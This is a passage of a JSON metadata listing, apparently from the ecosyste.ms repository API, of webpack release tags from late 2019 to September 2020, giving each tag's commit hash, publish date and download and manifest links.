2a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com